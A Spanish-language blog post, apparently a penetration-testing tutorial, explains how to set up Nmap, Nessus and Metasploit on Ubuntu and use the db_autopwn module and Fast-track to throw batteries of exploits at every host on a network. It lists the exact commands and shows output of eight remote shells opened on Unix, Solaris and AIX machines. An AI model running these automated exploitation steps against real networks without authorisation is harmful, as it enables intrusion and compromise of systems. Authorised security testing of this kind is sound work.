Seguro que a muchos ya os ha pasado y que en alguna que otra ocasión os han «soltado» en las oficinas de un cliente con vuestro portátil y la única premisa de demostrar, en tan sólo unas horas, que los equipos de su red son vulnerables y que un atacante malicioso podría REALMENTE llegar a robar información o poner en riesgo la integridad de los sistemas.
Si se os presenta esa situación o alguna otra en la que necesitéis obtener resultados rápidamente, no os importa hacer más ruido que un elefante en una cacharrería o simplemente queréis sentiros cual Rambo disparando exploits a diestro y siniestro, entonces Autopwn es vuestra herramienta.
Podríamos decir que Autopwn es la automatización de la explotación de sistemas hecha de forma fácil y sencilla. Un módulo de Metasploit que tiene la posibilidad de utilizar previamente los resultados de Nmap y/o Nessus para posteriormente lanzar automáticamente una batería de exploits contra los objetivos de una red.
A continuación vamos a describir muy esquemáticamente cómo preparar un sistema Ubuntu para utilizarlo.
– Instalar Nmap
sudo apt-get install nmap
– Instalar Nessus
sudo apt-get install nessus nessusd
Añadir usuario: nessus-adduser
Registrar: http://www.nessus.org/plugins/?view=register-info
/opt/nessus/bin/nessus-fetch –register xxxx-xxxx-xxxx-xxxx-xxxx
Actualizar regularmente: nessus-update-plugins
– Instalar Metasploit
sudo apt-get install ruby libruby rdoc
sudo apt-get install libyaml-ruby
sudo apt-get install libzlib-ruby
sudo apt-get install libopenssl-ruby
sudo apt-get install libdl-ruby
sudo apt-get install libreadline-ruby
sudo apt-get install libiconv-ruby
sudo apt-get install rubygems *
sudo gem install -v=1.2.2 rails
cd /opt
sudo mkdir MSF
cd MSF
sudo svn co http://metasploit.com/svn/framework3/trunk/
Actualizar regularmente: sudo svn update
– Autopwn + nmap
Instalar base de datos (mysql, sqlite3 o postgres) y drivers guardar los resultados de nmap y/o nessus:
sudo apt-get install mysql-server
sudo apt-get install ruby1.8-dev
sudo apt-get install libmysqlclient-dev
sudo gem install mysql
msf > db_driver (comprobar driver activo)
Crear la base de datos: msf > db_connect usuario:contraseña:Nombre_bbdd
Lanzar escaneo: msf> db_nmap -vvv -n -sT -PN x.x.x.x
Lanzar exploits: msf> db_autopwn -t -p -e
Comprobar sesiones obtenidas: msf > sessions -l
– Autopwn + Nessus
Importar resultados de Nessus: msf > db_import ruta/fichero.nessus
Lanzar exploits: msf> db_autopwn -t -x -r -e
Comprobar sesiones obtenidas: msf > sessions -l
[*] (1952/1952 [8 sessions]): Waiting on 0 launched modules to finish execution...
[*] The autopwn command has completed with 8 sessions
[*] Enter sessions -i [ID] to interact with a given session ID
[*]
[*] ================================================================================
Active sessions
===============
Id Type Information Connection Via
-- ---- ----------- ---------- ---
1 shell unix GET / HTTP/1.0 x.x.x.x:8871 -> x.x.x.x:34370 exploit/unix/webapp/twiki_search
2 shell solaris GET / HTTP/1.0 x.x.x.x:18612 -> x.x.x.x:52136 exploit/solaris/sunrpc/sadmind_adm_build_path
3 shell aix GET / HTTP/1.0 x.x.x.x:34879 -> x.x.x.x:37130 exploit/aix/rpc_cmsd_opcode21
4 shell solaris GET / HTTP/1.0 x.x.x.x:22384 -> x.x.x.x:59066 exploit/solaris/sunrpc/sadmind_adm_build_path
5 shell solaris HELP x.x.x.x:22384 -> x.x.x.x:59108 exploit/solaris/sunrpc/sadmind_adm_build_path
6 shell aix HELP x.x.x.x:34879 -> x.x.x.x:37177 exploit/aix/rpc_cmsd_opcode21
7 shell unix HELP x.x.x.x:8871 -> x.x.x.x:34416 exploit/unix/webapp/twiki_search
8 shell solaris HELP x.x.x.x:18612 -> x.x.x.x:52177 exploit/solaris/sunrpc/sadmind_adm_build_path
[*] ================================================================================
– Fast-track
¿Y si queremos dar otra vuelta de tuerca a la automatización? Es decir, ¿si podemos ahorrarnos todos los pasos anteriores y tan solo poner la IP/rango? pues para eso os recomiendo leeros el post de Shell Root en elhacker.net y utilizar Fast-track…
cd /opt
svn co http://svn.thepentest.com/fasttrack/
cd ./fasttrack
python setup.py install
./fast-track.py -g
Nota final: De lammers y script kiddies está lleno el mundo. Aunque la inmensa mayoría lo hacemos o lo somos en algún momento, subscribo el comentario de n3w y estoy de acuerdo cuando dice que con unos pocos comandos igual consigues una shell pero que lo interesante es aprenderse y comprender el trasfondo de la intrusión.